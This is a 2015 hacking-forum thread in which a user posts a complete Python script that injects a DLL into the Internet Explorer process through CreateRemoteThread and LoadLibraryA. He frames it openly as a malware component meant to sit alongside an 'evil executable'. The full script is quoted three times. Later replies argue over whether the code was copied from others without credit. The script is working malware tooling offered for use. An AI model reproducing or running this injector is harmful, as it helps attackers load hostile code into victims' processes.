May 24, 2017, 02:44:54 AM
Welcome, Guest. Please login or register.

CMFP (Certified Metasploit Framework Professional) Course is out! http://www.top-hat-sec.com/cmfp.html

Author Topic: FERNSEC's Python DLL-Injector.  (Read 1537 times)

Offline Vector

  • Prospect
  • *
  • Posts: 37
  • Internets: +10/-24
    • @AntiSec_Inc
FERNSEC's Python DLL-Injector.
« on: August 18, 2015, 11:53:28 AM »
I've made a script that will attempt to inject a predefined dll into the Internet Explorer process on Windows. One application could be in malware, this script assumes you have a dll called mydll.dll in the same directory as the script.(Presumably where it was downloaded in combination with your evil executable[After you have compiled the script]).

The formatting is a little unconventional because i had a 'print' after each operation in the script for testing purposes which have since been removed. Save for the final print which for your convenience together with the last 'else' can be commented out. Here's the code for the script:

Code: [Select]
from win32com.client import GetObject
from ctypes import *
import sys, ctypes, os, string, time

Wmi = GetObject('winmgmts:')
processes = Wmi.InstancesOf('Win32_Process')
# Get the IE process
explorer = Wmi.ExecQuery('select * from Win32_Process where Name="iexplore.exe"')
# Grab its Pid
PID = explorer[0].Properties_('ProcessId').Value

# Get DLL path
file = 'mydll.dll'

path = os.path.dirname(__file__)
DLL_PATH = os.path.join(path, file)


# Define constants we use
PAGE_RW_PRIV = 0x04
PROCESS_ALL_ACCESS = 0x1F0FFF
VIRTUAL_MEM = 0x3000

#CTYPES handler
kernel32 = windll.kernel32

def dll_inject(PID,DLL_PATH):
    LEN_DLL = len(DLL_PATH)# get the length of the DLL PATH
    hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS,False,PID)
   
    if hProcess == None:
       
        sys.exit(0)
   
    DLL_PATH_ADDR = kernel32.VirtualAllocEx(hProcess,
                                            0,
                                            LEN_DLL,
                                            VIRTUAL_MEM,
                                            PAGE_RW_PRIV)
    bool_Written = c_int(0)
   
    kernel32.WriteProcessMemory(hProcess,
                                DLL_PATH_ADDR,
                                DLL_PATH,
                                LEN_DLL,
                                byref(bool_Written))
   
    kernel32DllHandler_addr = kernel32.GetModuleHandleA("kernel32")
   
    LoadLibraryA_func_addr = kernel32.GetProcAddress(kernel32DllHandler_addr,"LoadLibraryA")
   
   
    thread_id = c_ulong(0) # for our thread id
   
    if not kernel32.CreateRemoteThread(hProcess,
                                None,
                                0,
                                LoadLibraryA_func_addr,
                                DLL_PATH_ADDR,
                                0,
                                byref(thread_id)):
       
        sys.exit(0)
    else:
        print "Remote Thread 0x%08x created, DLL code injected" % thread_id.value

dll_inject(PID, DLL_PATH)

Alternatively you can check the script out and download it via github by following this link.

https://github.com/FernSecurity/DLL-Injector

I've tested it on Windows 7 but it should be able to inject the dll into any Win32 process.

Feel free to modify and/or improve the script if you happen to do so, i'd love to see your work!
« Last Edit: August 18, 2015, 01:25:55 PM by FERNSEC »
"Words have no power to impress the mind without the exquisite horror of their reality"

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1710
  • Internets: +94/-0
  • My password is **********
Re: FERNSEC's Python DLL-Injector.
« Reply #1 on: August 18, 2015, 12:51:42 PM »

The formatting is a little unconventional because i had a 'print' after each operation in the script for testing purposes which have since been removed.

That is a clever idea FERNSEC. And quite practical when one is new and working with coding.
I will have to make sure to incorporate that if I ever get into coding/scripting.

Offline Vector

  • Prospect
  • *
  • Posts: 37
  • Internets: +10/-24
    • @AntiSec_Inc
Re: FERNSEC's Python DLL-Injector.
« Reply #2 on: August 18, 2015, 01:13:10 PM »

The formatting is a little unconventional because i had a 'print' after each operation in the script for testing purposes which have since been removed.

That is a clever idea FERNSEC. And quite practical when one is new and working with coding.
I will have to make sure to incorporate that if I ever get into coding/scripting.

Yeah man, it's a simple debugging technique but quite useful.
"Words have no power to impress the mind without the exquisite horror of their reality"

Sam

  • Guest
Re: FERNSEC's Python DLL-Injector.
« Reply #3 on: August 19, 2015, 03:26:13 AM »
source:
https://github.com/santoshkumarsingh/python/blob/master/dllinjection.py
https://waitfordebug.wordpress.com/2012/02/07/dll-injection-in-python/
https://github.com/infodox/python-dll-injection/blob/master/get_pid.py
https://github.com/batistam/VMInjector/blob/master/vminjector/vminject.py
ad infinitum

I've made a script that will attempt to inject a predefined dll into the Internet Explorer process on Windows. One application could be in malware, this script assumes you have a dll called mydll.dll in the same directory as the script.(Presumably where it was downloaded in combination with your evil executable[After you have compiled the script]).

The formatting is a little unconventional because i had a 'print' after each operation in the script for testing purposes which have since been removed. Save for the final print which for your convenience together with the last 'else' can be commented out. Here's the code for the script:

Code: [Select]
from win32com.client import GetObject
from ctypes import *
import sys, ctypes, os, string, time

Wmi = GetObject('winmgmts:')
processes = Wmi.InstancesOf('Win32_Process')
# Get the IE process
explorer = Wmi.ExecQuery('select * from Win32_Process where Name="iexplore.exe"')
# Grab its Pid
PID = explorer[0].Properties_('ProcessId').Value

# Get DLL path
file = 'mydll.dll'

path = os.path.dirname(__file__)
DLL_PATH = os.path.join(path, file)


# Define constants we use
PAGE_RW_PRIV = 0x04
PROCESS_ALL_ACCESS = 0x1F0FFF
VIRTUAL_MEM = 0x3000

#CTYPES handler
kernel32 = windll.kernel32

def dll_inject(PID,DLL_PATH):
    LEN_DLL = len(DLL_PATH)# get the length of the DLL PATH
    hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS,False,PID)
   
    if hProcess == None:
       
        sys.exit(0)
   
    DLL_PATH_ADDR = kernel32.VirtualAllocEx(hProcess,
                                            0,
                                            LEN_DLL,
                                            VIRTUAL_MEM,
                                            PAGE_RW_PRIV)
    bool_Written = c_int(0)
   
    kernel32.WriteProcessMemory(hProcess,
                                DLL_PATH_ADDR,
                                DLL_PATH,
                                LEN_DLL,
                                byref(bool_Written))
   
    kernel32DllHandler_addr = kernel32.GetModuleHandleA("kernel32")
   
    LoadLibraryA_func_addr = kernel32.GetProcAddress(kernel32DllHandler_addr,"LoadLibraryA")
   
   
    thread_id = c_ulong(0) # for our thread id
   
    if not kernel32.CreateRemoteThread(hProcess,
                                None,
                                0,
                                LoadLibraryA_func_addr,
                                DLL_PATH_ADDR,
                                0,
                                byref(thread_id)):
       
        sys.exit(0)
    else:
        print "Remote Thread 0x%08x created, DLL code injected" % thread_id.value

dll_inject(PID, DLL_PATH)

Alternatively you can check the script out and download it via github by following this link.

https://github.com/FernSecurity/DLL-Injector

I've tested it on Windows 7 but it should be able to inject the dll into any Win32 process.

Feel free to modify and/or improve the script if you happen to do so, i'd love to see your work!

Offline Vector

  • Prospect
  • *
  • Posts: 37
  • Internets: +10/-24
    • @AntiSec_Inc
Re: FERNSEC's Python DLL-Injector.
« Reply #4 on: August 19, 2015, 09:15:42 AM »
source:
https://github.com/santoshkumarsingh/python/blob/master/dllinjection.py
https://waitfordebug.wordpress.com/2012/02/07/dll-injection-in-python/
https://github.com/infodox/python-dll-injection/blob/master/get_pid.py
https://github.com/batistam/VMInjector/blob/master/vminjector/vminject.py
ad infinitum

I've made a script that will attempt to inject a predefined dll into the Internet Explorer process on Windows. One application could be in malware, this script assumes you have a dll called mydll.dll in the same directory as the script.(Presumably where it was downloaded in combination with your evil executable[After you have compiled the script]).

The formatting is a little unconventional because i had a 'print' after each operation in the script for testing purposes which have since been removed. Save for the final print which for your convenience together with the last 'else' can be commented out. Here's the code for the script:

Code: [Select]
from win32com.client import GetObject
from ctypes import *
import sys, ctypes, os, string, time

Wmi = GetObject('winmgmts:')
processes = Wmi.InstancesOf('Win32_Process')
# Get the IE process
explorer = Wmi.ExecQuery('select * from Win32_Process where Name="iexplore.exe"')
# Grab its Pid
PID = explorer[0].Properties_('ProcessId').Value

# Get DLL path
file = 'mydll.dll'

path = os.path.dirname(__file__)
DLL_PATH = os.path.join(path, file)


# Define constants we use
PAGE_RW_PRIV = 0x04
PROCESS_ALL_ACCESS = 0x1F0FFF
VIRTUAL_MEM = 0x3000

#CTYPES handler
kernel32 = windll.kernel32

def dll_inject(PID,DLL_PATH):
    LEN_DLL = len(DLL_PATH)# get the length of the DLL PATH
    hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS,False,PID)
   
    if hProcess == None:
       
        sys.exit(0)
   
    DLL_PATH_ADDR = kernel32.VirtualAllocEx(hProcess,
                                            0,
                                            LEN_DLL,
                                            VIRTUAL_MEM,
                                            PAGE_RW_PRIV)
    bool_Written = c_int(0)
   
    kernel32.WriteProcessMemory(hProcess,
                                DLL_PATH_ADDR,
                                DLL_PATH,
                                LEN_DLL,
                                byref(bool_Written))
   
    kernel32DllHandler_addr = kernel32.GetModuleHandleA("kernel32")
   
    LoadLibraryA_func_addr = kernel32.GetProcAddress(kernel32DllHandler_addr,"LoadLibraryA")
   
   
    thread_id = c_ulong(0) # for our thread id
   
    if not kernel32.CreateRemoteThread(hProcess,
                                None,
                                0,
                                LoadLibraryA_func_addr,
                                DLL_PATH_ADDR,
                                0,
                                byref(thread_id)):
       
        sys.exit(0)
    else:
        print "Remote Thread 0x%08x created, DLL code injected" % thread_id.value

dll_inject(PID, DLL_PATH)

Alternatively you can check the script out and download it via github by following this link.

https://github.com/FernSecurity/DLL-Injector

I've tested it on Windows 7 but it should be able to inject the dll into any Win32 process.

Feel free to modify and/or improve the script if you happen to do so, i'd love to see your work!

Your point being? If all you want is to point out how unoriginal a script of this sort is feel free to not post in my thread at all.

If you already have something for this, cool, if not here's my spin on it.
« Last Edit: August 19, 2015, 09:42:45 AM by FERNSEC »
"Words have no power to impress the mind without the exquisite horror of their reality"

Sam

  • Guest
Re: FERNSEC's Python DLL-Injector.
« Reply #5 on: August 19, 2015, 09:54:10 AM »
Point is that you did not write the code yourself.

Offline yashar26

  • Top Hat Member
  • Elite
  • ********
  • Posts: 584
  • Internets: +76/-2
  • Sec+, CEH v8, eCPPT Gold, eWAPT
Re: FERNSEC's Python DLL-Injector.
« Reply #6 on: August 19, 2015, 01:09:30 PM »
How awesome are you FERNSEC... copy paste someone else code, change a line or 2 and call it your code.. well done, we need more people like you in infosec.

Offline Vector

  • Prospect
  • *
  • Posts: 37
  • Internets: +10/-24
    • @AntiSec_Inc
Re: FERNSEC's Python DLL-Injector.
« Reply #7 on: August 19, 2015, 04:02:37 PM »
How awesome are you FERNSEC... copy paste someone else code, change a line or 2 and call it your code.. well done, we need more people like you in infosec.

Are you trying to tell me you never used an example when you made something? Lol, sounds legit. I got some code, added what i needed thought other people might find it useful so i posted it here, sorry for contributing to your dead forum.

Last time i checked all the scripts that Sam linked to did not get the PID of the IE process or the dll path on it's own. I'm not saying this is a marvel of coding, all i'm saying is you can stop being a condescending asshole and accept content wherever it's provided to you.

Any more complaints can be sent to /dev/null.
« Last Edit: August 19, 2015, 04:31:39 PM by FERNSEC »
"Words have no power to impress the mind without the exquisite horror of their reality"

Sam

  • Guest
Re: FERNSEC's Python DLL-Injector.
« Reply #8 on: August 20, 2015, 12:40:32 AM »
... did not get the PID of the IE process or the dll path on it's own. ...

Yea but you just copy pasted that from another person. Anyone can do that. This is not new content it is just recycling. Good job.

Offline yashar26

  • Top Hat Member
  • Elite
  • ********
  • Posts: 584
  • Internets: +76/-2
  • Sec+, CEH v8, eCPPT Gold, eWAPT
Re: FERNSEC's Python DLL-Injector.
« Reply #9 on: August 20, 2015, 03:12:33 AM »
How awesome are you FERNSEC... copy paste someone else code, change a line or 2 and call it your code.. well done, we need more people like you in infosec.

Are you trying to tell me you never used an example when you made something? Lol, sounds legit. I got some code, added what i needed thought other people might find it useful so i posted it here, sorry for contributing to your dead forum.

Last time i checked all the scripts that Sam linked to did not get the PID of the IE process or the dll path on it's own. I'm not saying this is a marvel of coding, all i'm saying is you can stop being a condescending asshole and accept content wherever it's provided to you.

Any more complaints can be sent to /dev/null.

Yes, I am a condescending asshole... when I see people plagiarizing, it makes my blood boil. But really it makes you look worse. There is no reason to insult me or other people. Next time you modify a few lines, at least quote where you found the original script.
I was tempted to ban you for insulting me, but i ll let the others see how much of an awesome person you are.

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1710
  • Internets: +94/-0
  • My password is **********
Re: FERNSEC's Python DLL-Injector.
« Reply #10 on: August 21, 2015, 02:47:32 PM »
Next time you modify a few lines, at least quote where you found the original script.

Yes, one should always give credit to the original coders.
FERNSEC, I am sure if you created a script and someone took it and added some things to improve it, you would like credit for the original script.
At least pretty much everyone I know would.  ;)